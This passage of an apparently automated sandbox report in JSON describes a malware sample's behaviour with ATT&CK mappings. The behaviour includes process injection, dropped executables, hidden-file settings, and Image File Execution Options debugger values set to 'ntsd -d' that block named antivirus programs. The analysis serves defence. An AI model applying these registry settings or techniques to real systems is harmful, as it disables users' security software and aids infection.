\"AdjustTokenPrivileges\"on file: \\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\NPFMntor.exe\" (UID: 00000000-00005848)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"explorer.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"explorer.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"explorer.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"explorer.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" reads file \"C:\\Program Files\\desktop.ini\"\n \"explorer.exe\" reads file \"C:\\Program Files\\desktop.ini\"\n \"explorer.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"explorer.exe\" reads file \"C:\\Users\\Public\\desktop.ini\"\n \"explorer.exe\" reads file \"C:\\Users\\Public\\Desktop\\desktop.ini\"\n \"explorer.exe\" reads file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\desktop.ini\"\n \"explorer.exe\" reads file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini\"\n \"explorer.exe\" reads file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\"\n \"explorer.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a\" has an entrypoint in section \"UPX1\"\n \"explorer.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"explorer.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\SAFEBOXTRAY.EXE\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\SAFEBOXTRAY.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\360SAFE.EXE\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\360SAFE.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\360SAFEBOX.EXE\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\360SAFEBOX.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\360TRAY.EXE\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\360TRAY.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\RAVCOPY.EXE\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\RAVCOPY.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\AVASTU3.EXE\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\AVASTU3.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\SCANU3.EXE\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\SCANU3.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\AVU3LAUNCHER.EXE\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\AVU3LAUNCHER.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\RUNIEP.EXE\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\RUNIEP.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\RFWMAIN.EXE\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\RFWMAIN.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\RFWSRV.EXE\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\RFWSRV.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\KAVPF.EXE\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\KAVPF.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\KPFW32.EXE\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"explorer.exe\" wrote 17920 bytes starting with PE header signature to file \"C:\\Program Files\\Common Files\\uiui8.dll\": 4d5a50000200000004000f00ffff0000ff0000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ff10000e1fff09ff21ff014cff21ffff546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a24370000000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"explorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%COMMONPROGRAMFILES%\\microsoft shared\\explorer.exe]- [targetUID: 00000000-00005848]\n \"uiui8.dll\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"- Location: [%COMMONPROGRAMFILES%\\uiui8.dll]- [targetUID: 00000000-00005848]\n \"DISMHOST.EXE.67A9C787.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [C:\\MFILES\\winlogon.exe]- [targetUID: 00000000-00005848]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" queried SystemProcessInformation at 00000000-00005784-00000105-1400861 [PID: 5784]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-80381 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-2116578 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-3712106 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-5084204 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-5599525 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-5653497 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-5740820 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-5813085 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-6207437 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-6317384 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-6359145 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-6827633 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-10217347 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-10251943 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-10274693 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-14210551 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-14237129 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-14265306 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-18210296 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-18232665 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-18254907 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-22211054 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-22235875 [PID: 5848]\n \"explorer.exe\" queried SystemProcessInformation at 00000000-00005848-00000105-22258160 [PID: 5848]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-113", "type": 3, "relevance": 7, "name": "Tries to save executable or command in registry", "description": "\"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\ASSOCIATIONS\"; Key: \"MODRISKFILETYPES\"; Value: \".exe\")", "origin": "Registry Access", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a\" has section name UPX1 with entropy \"7.86526418535\"\n \"explorer.exe\" has section name UPX1 with entropy \"7.86526418535\"\n \"uiui8.dll\" has section name CODE with entropy \"6.44764372871\"\n \"uiui8.dll\" has section name .reloc with entropy \"6.56847759107\"\n \"DISMHOST.EXE.67A9C787.bin\" has section name .text with entropy \"6.11476781338\"\n \"DISMHOST.EXE.67A9C787.bin\" has section name .data with entropy \"6.44580003198\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00005784)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-413", "type": 9, "relevance": 3, "name": "Spawned processes likely due to injection", "description": "Process \"%COMMONPROGRAMFILES%\\Microsoft Shared\\explorer.exe\" spawned likely due to injection", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"explorer.exe\" opened \"c:\\qdcrwv.txt\" with delete access\n \"explorer.exe\" opened \"c:\\gbvxvm.jpg\" with delete access\n \"explorer.exe\" opened \"c:\\mfvqlr.bmp\" with delete access\n \"explorer.exe\" opened \"c:\\ttdmri.gif\" with delete access\n \"explorer.exe\" opened \"C:\\MFILES\\winlogon.exe\" with delete access\n \"explorer.exe\" opened \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1681.lnk\" with delete access\n \"explorer.exe\" opened \"C:\\Program Files\\Common Files\\UIUI8.DLL\" with delete access\n \"explorer.exe\" opened \"C:\\qdcrwv.txt\" with delete access\n \"explorer.exe\" opened \"C:\\gbvxvm.jpg\" with delete access\n \"explorer.exe\" opened \"C:\\mfvqlr.bmp\" with delete access\n \"explorer.exe\" opened \"C:\\ttdmri.gif\" with delete access\n \"explorer.exe\" opened \"C:\\QDCRWV.TXT\" with delete access\n \"explorer.exe\" opened \"C:\\GBVXVM.JPG\" with delete access\n \"explorer.exe\" opened \"C:\\MFVQLR.BMP\" with delete access\n \"explorer.exe\" opened \"C:\\TTDMRI.GIF\" with delete access\n \"explorer.exe\" opened \"C:\\MFILES\\WINLOGON.EXE\" with delete access\n \"explorer.exe\" opened \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1681.LNK\" with delete access\n \"explorer.exe\" opened \"C:\\Windows\\System32\\drivers\\etc\\hosts\" with delete access\n \"explorer.exe\" opened \"C:\\RECYCLER\\WINLOGON.EXE\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-120", "type": 6, "relevance": 10, "name": "Calls an API typically used to run the specified application", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"WinExec\" with parameter %COMMONPROGRAMFILES%\\Microsoft Shared\\explorer.exe (UID: 00000000-00005784)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" touched \"k:\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" touched \"l:\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" touched \"m:\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" touched \"n:\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" touched \"o:\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" touched \"p:\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" touched \"q:\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" touched \"r:\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" touched \"s:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" wrote 32 bytes to a remote process \"C:\\Program Files\\Common Files\\microsoft shared\\explorer.exe\" (Handle: 204)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" wrote 52 bytes to a remote process \"C:\\Program Files\\Common Files\\microsoft shared\\explorer.exe\" (Handle: 204)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" wrote 4 bytes to a remote process \"C:\\Program Files\\Common Files\\microsoft shared\\explorer.exe\" (Handle: 204)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" allocated memory in \"C:\\1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-15", "type": 3, "relevance": 5, "name": "Changes file extension appearance of the explorer", "description": "\"explorer.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"SHOWSUPERHIDDEN\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1546.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-32", "type": 3, "relevance": 8, "name": "Reads Antivirus engine related registry keys", "description": "\"explorer.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\QQ\")\n \"explorer.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\QQDOCTOR\")\n \"explorer.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\QQ2009\")", "origin": "Registry Access", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-64", "type": 3, "relevance": 10, "name": "Modifies auto-execute functionality to enable the debugger hack", "description": "\"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\SAFEBOXTRAY.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\360SAFE.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\360SAFEBOX.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\360TRAY.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\RAVCOPY.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\AVASTU3.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\SCANU3.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\AVU3LAUNCHER.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\RUNIEP.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\RFWMAIN.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\RFWSRV.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\KAVPF.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\KPFW32.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: 